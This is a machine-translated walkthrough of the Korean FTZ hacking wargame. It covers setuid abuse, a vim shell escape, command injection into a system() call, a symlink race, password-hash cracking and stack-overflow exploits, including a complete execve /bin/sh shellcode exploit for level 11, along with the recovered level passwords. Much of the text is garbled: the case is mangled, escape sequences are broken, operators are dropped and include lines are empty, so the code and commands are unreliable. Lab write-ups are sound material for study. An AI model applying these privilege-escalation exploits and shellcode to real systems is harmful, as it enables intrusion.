I played a Korean FTZ, I feel very good, I have a learning value. I wrote the way I passed.
It is reviewed.
There are several attention:
1. Each user can see your password through my-pass command, which is the basis of the pass.
That is, after the user of Level (n) got the Shell of the Level (n 1) user, you can run my-pass, you can
Know the password of the Level (n 1) user.
2. There is a hint file in each Level user directory, which is a prompt. It is absolutely necessary to read this hint.
Of course, I have written in Korean. I have translated below, so I'm reading the article, and the following translation can be carried out.
Exercise.
3. Don't use the shell who get the shell, to block the entire domestic IP, and everyone has not played.
Now, you will now explain the pass method. If you don't solve it, you can send it to me B_H_M_666@hotmail.com
Pass method:
************************* Level1 ***************************** *******************
[Level1 @ ftz level1] $ more hint
Find file with level2 user setuid
[Level1 @ ftz level1] $ find / -user level2 -perm 4000 2> / dev / null
/ bin / excuteme
[Level1 @ ftz level1] $ / bin / excuteme
Now you can run any commands other than My-Pass and Chmod with Level2 User Permissions
[Level2 @ ftz leve2] $ / bin / bash // then we run away directly Level2
SHELL.
[Level2 @ ftz level2] $ my-pass
Level2 Password is "Hacker or Cracker".
Description:
1. Look at the Hint file after each check, this is necessary;
The 2.Find command can provide services that better than Windows search function, which can be entered according to information such as users, permissions.
Search;
3. About 2> / dev / null, 2 Indicates the standard error in the * NIX system, this command can be explained as
During the search process, standard error redirect to an insignificated file, the following is the specific information
CRW-RW-RW- 1 root root 1, 3 2003-01-30 / dev / null
*********************************************************** ***********************
************************************************************ *******************
[Level2 @ ftz level2] $ more hint
It is said that some file editor can also perform commands.
[Level2 @ ftz level2] $ FIND / -USER Level3 -perm 4000 2> / dev / null
/ usr / bin / editor
[Level2 @ ftz level2] $ / usr / bin / editor
Familiar VIM interface will appear after this program is executed
Then review the three states of Vim and various commands: P
Press ESC first here, then enter :, enter commands here! My-pass
Then I saw the password of Level3
Level3 Password Is "Can you fly?".
Hit Enter or Type Command to Continue Description:
1.vim and other file editor functions are very powerful, just like this, can execute shell commands
2. Because the Editor file is a setUID with the Level3 user, the command executed in this editor is
According to the permissions of the Level3 user, you can get the password of Level3.
*********************************************************** ***********************************
********************************** Level3 ************** *********************
[Level3 @ ftz level] $ more hint
The following is the source code of Autodig
#include
#include
#include
INT main (int Argc, char ** argv) {
CHAR CMD [100];
IF (argc! = 2) {
Printf ("Auto Digger Version 0.9 / N");
Printf ("USAGE:% S Host / N", Argv [0]);
exit (0);
}
STRCPY (CMD, "DIG @");
STRCAT (CMD, Argv [1]);
STRCAT (CMD, "Version.bind Chaos TXT");
System (cmd);
}
Please use this permission to get Level4
More hints.
---- How to submit multiple parameters simultaneously
[Level3 @ ftz level3] $ find / -name autodig 2> / dev / null
/ bin / autodig
[Level3 @ ftz level] $ / bin / autodig
Auto Digger Version 0.9
USAGE: / BIN / Autodig Host
[Level3 @ ftz level3] $ / bin / autodig "; my-pass"
Level4 Password is "suck my brain".
[Level3 @ ftz level3] $
Description:
1. You can use the source code to see the program at all, if you have no appropriate monitoring, you will be submitted to System.
A function, which produces a bug (of course, it can also consider the possibility of overflow of the buffer, but there is no need
want);
2. In the program, "" "in this manner, the parameters inside, with ';' is the split point.
*********************************************************** ***********************************
****************************** Level4 ****************** *********************
[Level4 @ ftz level4] $ more hint
It is said that someone left the back door in /etc/xinetd.d/
[Level4 @ ftz level4] $ more /etc/xinetd.d (a mistake, there is no see the directory)
*** /etc/xinetd.d: Directory ***
[Level4 @ ftz level4] $ find / -user level5 -perm 4000 2> / dev / null
[Level4 @ ftz level4] $ find /etc/xinetd.d/-user level5 -perm 4000 2> / dev / null seems to be less than the first time
[Level4 @ ftz level4] $ ll /etc/xinetd.d
Total 52
-rw-r - r - 1 root root 171 mar 28 2003 Backdoor
-rw-r - r - 1 root root 295 mar 28 2003 chargen
-rw-r - r - 1 root root 315 Mar 28 2003 Chargen-UDP
-rw-r - r - 1 root root 295 mar 28 2003 daytime
-rw-r - r - 1 root root 315 mar 28 2003 daytime-udp
-rw-r - r - 1 root root 287 mar 28 2003 echo
-rw-r - r - 1 root root 306 mar 28 2003 echo-udp
-rw-r - r - 1 root root 312 Mar 28 2003 Servers
-rw-r - r - 1 root root 310 Mar 28 2003 Services
-rw-r - r - 1 root root 406 mar 28 2003 SGI_FAM
-rw-r - r - 1 root root 302 mar 28 2003 telnet
-rw-r - r - 1 root root 319 Mar 28 2003 TIME
-rw-r - r - 1 root root 315 Mar 28 2003 Time-UDP
[Level4 @ ftz level4] $ cd /etc/xinetd.d
[Level4 @ ftz xinetd.d] $ CAT Backdoor
Service finger
{
Disable = no
Flags = Reuse
Socket_type = stream
Wait = NO
User = level5
Server = / Home / Level4 / TMP / Backdoor
LOG_ON_FAILURE = UserID
}
[Level4 @ ftz xinetd.d] $ finger @localhost
^ [[H ^]
Level5 Password Is "What is your name?".
[Level4 @ ftz xinetd.d] $
Description:
1. Here the most important thing is the profile of the /etc/xinetd.d/backdoor, you can see it.
Typical network service profile,
Service finger
{
Disable = no; YES means that the service is closed, and no is a representation.
Flags = Reuse
Socket_type = stream
Wait = NO
User = level 5; Represents execution permission server = / home / level4 / tmp / backdoor; provides a service file, here will be
Below
LOG_ON_FAILURE = UserID
}
2. About the Server in Backdoor, you will know if you look at it, you will have a link at this time.
It is the process of writing the / home / level4 / tmp / backdoor file because this file is in someone else.
It has been written, so we don't have this process. In fact, this thing is very simple, the following is
#! / bin / bash
My-pass
This is OK, a simple script, as long as the finger service is called, the configuration file is limited by Level5
Limited to run this shell.
*********************************************************** *****************************
******************************** Level5 *************** *********************
[Level5 @ ftz level] $ more hint
Program / usr / bin / level 5 is born in the / tmp directory is a temporary file named Level5.tmp
Please use this permission to get Level6
Here you need to use the competitive adventure principle. Because each temporary file has a maintenance time from the generated to be deleted, such as
If you have this temporary file within this time, you can reach the purpose of reading content.
[bhm @ b bhm] $ su
PASSWORD:
[root @ b bhm] # cat> 1.txt
How to Play H4X0R Game
In the root input 1.txt text content. We link 1.txt with ordinary users BHM permission
[root @ b bhm] # exit
exit
[bhm @ b bhm] $ ln -s 1.txt 2.txt
[bhm @ b bhm] $ ll2.txt
LRWXRWXRWX 1 BHM BHM 5 December 6 01:30 2.txt -> 1.txt
[bhm @ b bhm] $ more 2.txt
How to Play H4X0R Game
[bhm @ b bhm] $
There is no doubt that you can read the contents of TXT. So the key question is how to put temporary text in this short instant
A problem that is linked. The method of human operation is definitely unreasonable, so you can consider writing two programs.
One is responsible for running / usr / bin / level5, and the other is dedicated to linking this temporary file.
The procedure is as follows:
[bhm @ b f.t.z] $ more Level5_1.c
#include
Int main () {
INT I;
For (i = 0; i <100; i ) {
System ("/ usr / bin / level5);
}
}
[bhm @ b f.t.z] $ more level5_2.c
#include
Int main () {
INT I;
System ("Touch Level5.txt");
For (i = 0; i <100; i ) {
System ("ln -s /tmp/level5.tmp ./level5.txt");
}
}
At the same time, the two shells are run separately, and PASSWORD can be read from Level5.txt. Read the password is: What the hell
This time I thought I thought for a long time, and later I saw someone in the forum.
How to pass it. Later, I was tested on this machine and found it, then test it on f.t.z.
*********************************************************** *****************************
********************************************************** **********************
Login: Level6
PASSWORD:
Last login: Thu Dec 4 16:31:40 from 61.255.11.117
Hint This is a hacker method that is often used on the menu of Telnet-type BBS.
Description:
1. After you are here, Telnet is stagnant, didn't see the shell representation;
2. Give a signal according to the regular method Ctrl C, and then the shell representation appears
Can continue
[Level6 @ ftz level6] $ ll
Total 32
-rw-r - r - 1 root root 72 NOV 22 2000 Hint
-rw-r ----- 1 Root Level6 36 Mar 24 2000 Password
DRWXR-XR-X 2 root level4096 Feb 23 2002 public_html
DRWXRWXR-X 2 root level4096 DEC 4 16:32 TMP
-RWXR-X --- 1 Root Level6 14910 Mar 4 2003 TN
[Level6 @ ftz level] $ more hint
This is a hacking method that is often used on the menu of Telnet type BBS. ----- still that content!
[Level6 @ ftz level] $ more password
Level7 Password is "come together".
[Level6 @ ftz level6] $
It's so simple, passing Level6
*********************************************************** *****************************
************************************************** **********************
[Level7 @ ftz level7] $ more hint
Execution / bin / level7 file will ask you to enter a password:
1. Password is nearby ............
2. Need to play imagination;
3. Can you transform the 2-based number into 10?
4. Need to replace your calculator to scientific calculator.
Description:
1. Is it very short? This level will begin more forms of reasoning questions, program questions, etc.
Logical reasoning questions like this (still an imagination) repeatedly appeared in the hacker competition in Korea
It seems that logical reasoning and imagination are one of the basic qualities of hackers;
2. After playing this, I found that my imagination is serious, but there is no shortage of observation.
I found a source code in the user directory, as follows:
int main ()
{
Printf ("/ x6d / x61 / x74 / x65 / n");
}
Compiled by the password to: Mate
Run / bin / level7 Enter the password Mate
Congratulation! Next Password is "Break the world". Of course, this level is not only this method, but also a more cool method Hiehie
[Level7 @ ftz level7] $ strings / bin / level7
/LIB/ld-linux.so.2
__GMON_START__
Libc.so.6
PRINTF
Fgets
SYSTEM
Malloc
__deregister_frame_info
stdin
Strncmp
exit
_IO_STDIN_USED
__LIBC_START_MAIN
__register_frame_info
GLIBC_2.0
Ptrh
Insert The Password:
Mate ======> This is the password we have to enter.
Congratulation! Next Password is "Break the world". =====> and this? Haha
Cat /bin/wrong.txt =====> Later, this is a further prompt. Of course, I don't have this.
[Level7 @ ftz level7] $
*********************************************************** ***********************************
********************************************************** ****************
Still first view Hint, the content is:
Level9's Shadow is hidden in some place, only knows its size 1481
Another Find application
[Level8 @ ftz level8] $ find / -size 1481c -print 2> / dev / null
/etc/rc.d/found.txt
/etc/log.d/scripts/services/afpd
/usr/lib/gcc-lib/i386-redhat-linux/3.2.2/include/javax/naming/event/namingevent.h
/usr/lib/python2.2/site-packages/ft/lib/util.pyc
/usr/share/doc/imagemagick-5.4.7/www/api/types/profileinfo.html
/ usr / share / i18n / locales / de_be @ euro
/ usr / share / i18n / locales / fr_be @ euro
/usr/share/locale/PL/LC_MESSAGES / GNOME-PILOT.MO
/usr/share/locale/eu/lc_messages/gtk20.mo
/usr/share/pixmaps/ooo_draw.png
/usr/share/man/man3/curs_inch.3x.gz
/usr/share/vim/vim61/syntax/abaqus.vim
/usr/share/iMagemagick/www/api/types/profileinfo.html
/usr/share/foomatic/db/source/driver/djet500.xml
/usr/share/foomatic/db/source/printer/72736.xml
/usr/src/linux-2.4.20-8/drivers/addon/iscsi/md5.h
/usr/src/linux-2.4.20-8/drivers/i2c/makefile
/usr/src/linux-2.4.20-8/include/asm-sparc/pbm.h/usr/src/linux-2.4.23/include/ASM-SPARC/PBM.H
/usr/src/linux-2.4.25/include/asm-sparc/pbm.h
/usr/src/linux-2.4.24/include/asm-sparc/pbm.h
The result found a lot of files, first looks at the first one.
[Level8 @ ftz level8] $ more /etc/rc.d/found.txt
Level9: $ 1 $ VKY6SSLG $ 6RYUXTNMEVGSFY7XF0WPS.: 11040: 0: 99999: 7: -1: -1: 134549524
Oh ~~ It turns out that it is necessary to find Find and will not use John.
John This software is also like NMAP is a very classic hacker software. The impact caused by the year is not less
The effect of Satan. Specific use can view the help.
Go back to this machine to start cracking:
[bhm @ b Run] $ ls
All.chr john.ini lanman.chr password.lst unshadow
Alpha.chr John John.log Level9.pwd Unafs
Digits.chr john.conf john.pot mailer unique
[bhm @ b Run] $ john -w: password.lst level9.pwd
Loaded 1 Password Hash (FreeBSD MD5 [32/32])
Apple (Level9)
Guesses: 1 Time: 0: 00: 00: 00% C / S: 1450 Trying: Apple
Soon the crack, the password is Apple ~~!
Level8 is so easy.
*********************************************************** ***********************************
******************* Level9 ****************** *****************
Keep up the good health ~~ Oh oh
Login: Level9
PASSWORD:
Last Login: Tue Apr 20 19:10:03 from 210.124.214.129
[Level9 @ ftz level9] $ more hint
The following is the source code of / usr / bin / bof uses this code to get the password of Level10
#include
#include
#include
MAIN () {
Char buf2 [10];
Char BUF [10];
Printf ("IT CAN Be overflow:");
FGETS (BUF, 40, stdin);
IF (strncmp (buf2, "go", 2) == 0)
{
Printf ("Good Skill! / N");
SetREUID (3010, 3010);
SYSTEM ("/ bin / bash");
}
}
I don't want to know the ID == 3010 of Level10.
This is more troublesome can only analyze it. Take out the GDB start analysis
GDB is a debugging tool that comes with the Linux system, powerful, and how to use the online manual.
The analysis will look at the following critical part of the code:
Start part
(GDB) disass main
Dump of assembler code for function main:
0x08048420
0x08048423
0x08048426
..............................
2. Problem Stack section
0x08048454
For 0xBfffFF880, for Strncmp
Places where parameters are stored
0x08048457
0x0804845a
0x0804845c
Memory space, press this string into the stack area
0x08048461
Will 0xBFFFFFF880 content
Eax
0x08048464
0x08048465
Two parameters will be compared
If two parameters are equal
ESX will be set
0x0804846a
0x0804846d
0x0804846f
Determine if EAX is zero
If you continue to execute
Jump to the zero
0x80484A0 is
0x080484A0
0x08048471
0x08048474
It can be seen that we can turn the data in 0xBffFFFFFFFFFFFFFFFFFFFFfffffFFFFFFFFFFFFFFFFFFFFFFFFFFffffFffFFFFFFFFFFFFFFFFFFFFffFfffFFFFFFFFFFFFFE
So how do you make the data in the 0xBFFFFFF880 become Go?
Start the dynamic analysis section:
Set breakpoints in 0x08048454 and 0x08048465, and run
(GDB) B * 0x08048454
Breakpoint 1 at 0x8048454: File Level9.c, line 11.
(GDB) B * 0x08048465
Breakpoint 2 at 0x8048465: File Level9.c, line 13.
(GDB) R
(GDB) R
Starting Program: /Home/bhm/myprogarm/test/f.t.z/level9
IT can be overflow: aaaaaaaaa // can enter it.
Breakpoint 1, 0x08048454 in main () at level9.c: 11
11 FGETS (BUF, 40, stdin);
Then check the contents of the following registers
(GDB) I REG
................................
Because ESP is the top of the stack, check the situation of the stack area
(GDB) X / 32 $ ESP-16
.................................
Can be found from the system start 0xbffff870 stack area for storing a string, the string being from here because
0x61616161.
Calculate 0xBffFFFF880 - 0xBffff870 = 0x10 = 16
That is to say, enter the string "GO" after entering 16 strings "a", you can verify it through Test.
Try a try * ^ * ^ *
[bhm @ b f.t.z] $ ./level9
IT CAN Be overflow: Aaaaaaaaaaaaaaago
Good Skill!
[bhm @ b f.t.z] $ ps
PID TTY TIME CMD
2787 PTS / 0 00:00:00 Bash
2818 PTS / 0 00:00:18 Fcitx
14279 PTS / 0 00:00:00 Level9
14280 PTS / 0 00:00:00 Bash
14310 PTS / 0 00:00:00 PS
[bhm @ b f.t.z] $
Because if the BASH is not seen in this machine, you will take a closer look at the PID 14280 process.
Get the shell ^ _ *
The resulting password is "Interesting to Hack!"
*********************************************************** **********************************
************************* Level10 ****************************** ******************
Continue to continue haha
Login: Level10
PASSWORD:
Last login: Tue Apr 20 14:24:21 from 220.122.59.34
[Level10 @ ftz level10] $ more hint
Now there are two users who are chatting with chat room. This chat room uses shared memory, the key_t value is
7530, the dialogue uses the variable name to text. Use this to hear two people's conversations and get the password of the Level11
It seems that this test is programming, but it is a bit simple:
Check out the function of sharing memory;
2. Discover the SHMGET and SHMAT functions can be used
3. Use the manual with your own system to view the specific usage method (you can view the INFO function name)
Then write the program:
#include
#include
Int main (void)
{
Int shmid;
Char * memptr;
IF ((shmid = shmget ((Key_T) 7530, 512, IPC_CREAT | 0666)) <0)
{
Printf ("Shmget () Function Error./N");
Exit (1);
}
IF ((Memptr = shmat (shmid, 0, 0)) == -1)
{
Printf ("Shmat () Function Error./N");
Exit (1);
}
Printf ("% S / N", Memptr);
Return 0;
}
Compile and run:
[Level10 @ ftz tmp] $ ./a.out
Mengmeng: What is the password of Level11?
GUTA: Yes! @ # $?
Mengmeng and GUTA are two system administrators: p password is very complicated, walk ~~
*********************************************************** **********************************
********************************************************** ****************
Login: Level11
PASSWORD:
Last Login: Wed Apr 21 00:11:07 from 220.73.26.23
[Level11 @ ftz level11] $ more hint
#include
#include
Int main (int Argc, char * argv [])
{
Char Str [256];
SetREUID (3092, 3092);
STRCPY (STR, Argv [1]);
Printf (STR);
}
[Level11 @ ftz level11] $
Don't think, start overflow SIGH
I use a technology introduced by OYXIN, and the specific article shows it.
http://www.xfocus.net/articles/200305/531.html
So I don't waste your mouth.
Post my source code, basically nothing to do with Oyxin code, because the overflow program has templateism.
[bhm @ b f.t.z] $ more attcak11.c
#include
#include
#include
#define bufsize 264 // The system is the number of bytes assigned to the vulnerability program
Char shell [] = "/ x31 / xc0 / x50 / x68 / x2f / x2f / x73 / x68"
"/ x68 / x2f / x62 / x69 / x6e / x89 / xe3 / x89"
"/ x64 / x24 / x0c / x89 / x44 / x24 / x10 / x8d"
"/ X4C / X24 / X0C / X8B / X54 / X24 / X08 / XB0"
"/ x0b / xcd / x80";
Int main (void)
{
Char buf [buffsize 12];
Char * prog [] = {"../attackme", buf, null}; // bug program path
Char * env [] = {"Home = / home / level11 / TMP", shell, null}; // overflower PWD
Unsigned long Ret = 0xc0000000 - SIZEOF (VOID *) - STRLEN (PROG) - STRLEN (Shell) - 0x02;
MEMSET (BUF, 0x41, SIZEOF (BUF));
Memcpy (BUF BUFSIZE 4, (Char *) & Ret, 4);
BUF [buffsize 8] = 0x00;
Execve (PROG [0], PROG, ENV);
Return 0;
}
[bhm @ b f.t.z] $
[Level11 @ ftz tmp] $ gdb ../attackme -q
(GDB) disass main
Dump of assembler code for function main:
0x08048470
0x08048471
0x08048473
0x08048479
0x0804847c
0x08048481
...............................................
[Level11 @ ftz tmp] $ dir ../
Attackme hint public_html tmp ====> The vulnerability program is AttackMe
[Level11 @ ftz tmp] $ PWD
/ home / level11 / tmp ====> Now overflower location
[Level11 @ ftz tmp] $ ../attackme `perl -e 'print" a "x267'`
At this time, 267 character A did not have a paragraph error.
[Level11 @ ftz tmp] $ ../attackme `perl -e 'print" a "x268'`
At this time, the error occurred, and the 264 bytes allocated than the memory were 4 bytes, because this
The 4 bytes are EBP, while 268 bytes have started overwriting EIP.
Now compile the program to test:
[Level11 @ ftz tmp] $ GCC B.C
[Level11 @ ftz tmp] $ ./a.out
SH-2.05B $ My-Pass
Term Environment Variable Not Set.
Level12 Password IS "It is like this".
SH-2.05B $
I have become: p Thanks to oyxin's good things.
*********************************************************** **********************************
*********************** Level 12 ********************************* *******************
Login: Level12
PASSWORD:
Last login: WED JUL 7 15:34:51 from 211.194.178.186
[Level12 @ ftz level12] $ more hint
#include
#include
#include
Int main (void)
{
Char Str [256];
Setreuid (3093, 3093);
Printf ("Please enter a string ./n");
Gets (STR);
Printf ("% S / N", STR);
}
[Level12 @ ftz level12] $
Gets () overflow!
